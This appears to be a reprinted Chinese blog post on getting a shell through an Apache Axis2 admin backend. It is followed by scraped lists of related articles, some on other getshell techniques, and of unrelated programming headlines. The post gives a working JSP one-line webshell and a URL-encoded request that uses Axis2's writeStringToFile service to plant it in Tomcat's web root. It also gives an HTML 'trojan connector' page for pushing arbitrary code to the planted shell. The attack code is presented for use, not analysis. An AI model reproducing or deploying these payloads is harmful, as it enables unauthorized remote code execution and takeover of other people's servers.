<% if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("//")+request.getParameter("f"))).write(request.getParameter("t").getBytes()); %>

http://xx.xx.xx.xx/axis2/services/Cat/writeStringToFile?data=%3c%25%20%69%66%28%72%65%71%75%65%73%74%2e%67%65%74%50%61%72%61%6d%65%74%65%72%28%22%66%22%29%21%3d%6e%75%6c%6c%29%28%6e%65%77%20%6a%61%76%61%2e%69%6f%2e%46%69%6c%65%4f%75%74%70%75%74%53%74%72%65%61%6d%28%61%70%70%6c%69%63%61%74%69%6f%6e%2e%67%65%74%52%65%61%6c%50%61%74%68%28%22%2f%2f%22%29%2b%72%65%71%75%65%73%74%2e%67%65%74%50%61%72%61%6d%65%74%65%72%28%22%66%22%29%29%29%2e%77%72%69%74%65%28%72%65%71%75%65%73%74%2e%67%65%74%50%61%72%61%6d%65%74%65%72%28%22%74%22%29%2e%67%65%74%42%79%74%65%73%28%29%29%3b%20%25%3e&file=/E:/j2ee/Tomcat6014/webapps/axis2/1.jsp&encoding=utf-8&append=false

<html><head><title>JSP一句话木马客户端</title></head><div align=center> <font color=red>专用JSP木马连接器</font><br><form name=get method=post>服务端地址<input name=url size=110 type=text> <br><br><textarea name=t rows=20 cols=120>你提交的代码</textarea><br>保存成的文件名：<input name=f size=30 value=shell.jsp><input type=button οnclick="javascript:get.action=document.get.url.value;get.submit()" value=提交> </form> <br>服务端代码：<br><textarea rows=5 cols=120><%if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("\")+request.getParameter("f"))).write(request.getParameter("t").getBytes());%> </textarea> </div></body> 

转载于:https://www.cnblogs.com/peterpan0707007/p/10569557.html

【实战】Axis2后台Getshell相关推荐

1. ThinkPHP 3.2.3~5.0.10 缓存函数设计缺陷后台GetShell实战

   0×00 前言 ThinkPHP是为了简化企业级应用开发和敏捷WEB应用开发而诞生的,由于其简单易用,很多cms都基于该框架改写.然而 Thinkphp在缓存使用却存在缺陷,生成缓存时,Thinkph ...

2. Apache Axis2 后台文件上传getshell 漏洞复现

   0x00 前言 Apache Axis2是一个Web服务的核心支援引擎.AXIS2对旧有的AXIS重新设计及重写,并提供两种语言Java及C的开发版本. 事实上AXIS2 不只为WEB应用程序提供We ...

3. php后台提权,基于ThinkPHP的2个CMS后台GetShell利用

   * 本文作者:Mochazz,本文属FreeBuf原创奖励计划,未经许可禁止转载文章作者:Mochazz 思路作者:szrzvdny 0x00 前言 ThinkPHP是为了简化企业级应用开发和敏捷WE ...

4. Vue 2.x 实战之后台管理系统开发（二）

   1. 导语 承接上文:Vue 2.x 实战之后台管理系统开发(一) 在上一篇文章中,我详细叙述了如何创建项目框架和引入各种后台常用插件,做好这些准备工作后,我们就可以着手进行页面的开发了.在开发过程中 ...

5. asp 退出登录修改cookie能进入后台_某logCMS的代码审计：越权到后台getshell

   某logCMS的代码审计:越权到后台getshell 前言 ​ 学习CTF这么久还没真正意义上审计过一款cms,这次决定花点时间去审计一款cms作为代码审计提升的跳板.由于相关要求,这里就省去cms全 ...

6. php+sha512+漏洞,PhpMyWind最新版本注入+后台getshell

   转自http://wooyun.org/bugs/wooyun-2010-051256 洞主文中没说清楚,厂商也忽略了. 简要分析如下 漏洞出在/order.php中 [php] function G ...

7. VUE全家桶项目实战-- 4.后台首页布局

   VUE全家桶项目实战-- 4.后台首页布局 一.页面布局 二.创建Home组件 三.路由index.js 文件配置主页路径 四.添加welcome组件 一.页面布局 <el-container& ...

8. 视频教程-vuecli实战商城后台管理系统-Vue

   vuecli实战商城后台管理系统 帝莎学院创始人&CEO,目前主要从事全栈开发.Python.PHP.小程序.App.Web等技术的研究和开发.专注于实战类教程,授课风趣幽默,讲解条理清晰.通 ...

9. 通达oa wbupload.php,通达 OA 代码审计篇二 ：11.8 后台 Getshell

   作者:LoRexxar'@知道创宇404实验室 日期:2021年3月9日 前篇中提到的漏洞在11.8版本中被完全修复后,我痛定思痛,从头开始找一个新的漏洞,于是就有了今天这个漏洞的诞生,但没想到的是, ...

10. Thinkphp实战教程后台管理系统开发

    目录 ├─Thinkphp5 后台管理开发.png ├─Thinkphp5 后台管理开发.xmind ├─Thinkphp实战教程后台管理系统开发-1.课程介绍及大纲.mp4 ├─Thinkphp实战 ...

最新文章

1. 根据CPU核数合理设置线程池大小
2. LabelButtonScale
3. java连接pg_postgresql 入门（含java、scala连接代码）
4. 利用BeanUtils在对象间复制属性
5. 微软正式推免费Word 电脑商Office收费降60%
6. 安装modelsim
7. mysql 性能问题_mysql 性能问题
8. 数据结构上机实践第八周项目3-顺序串算法
9. 汇编学习--7.17--键盘输入和磁盘读写
10. Spring Security环境搭建+用户认证和授权+注销
11. 提高COOKIE的安全性－－相关解决方案
12. 【场景实战】 头像违规的审查场景
13. Zune账号注册教程
14. python 柱状图和折线图放在一起_一款多条折线与柱状图共存图表
15. [转载]浙江杭西高2011年5月高二地理(徐霞客游记TV版-
16. 晨光文具商城多个商品里图片快速复制保存
17. 网站标题关键词SEO优化技巧
18. html5怎么写副标题,论文指导：论文题目副标题怎么写
19. [unity]在unity中创建圆锥体
20. 广州出生婴儿登记入户程序

热门文章

1. 拓端tecdat|R语言实现k-means聚类优化的分层抽样(Stratified Sampling)分析各市镇的人口
2. 拓端tecdat|R语言使用Profviz进行Metropolis-in-Gibbs抽样和运行时间分析
3. php 字符串方法名,PHP使用字符串名称调用类的方法是什么
4. java integer源码_Integer包装类源码分析
5. python 异步api ThreadPoolExecutor 、ProcessPoolExecutor(多线程、多进程)
6. file 图片上传 java_Java MultipartFile 上传文件/上传图片 亲测
7. MatCaffe问题: make matcaffe 'matlab/+caffe/private/caffe_.mexa64' failed
8. 在Python中从头开始迭代本地搜索
9. Tensorspace一款神奇的神经网络可视化应用
10. 安装nodejs出现Invalid drive: f:\的解决办法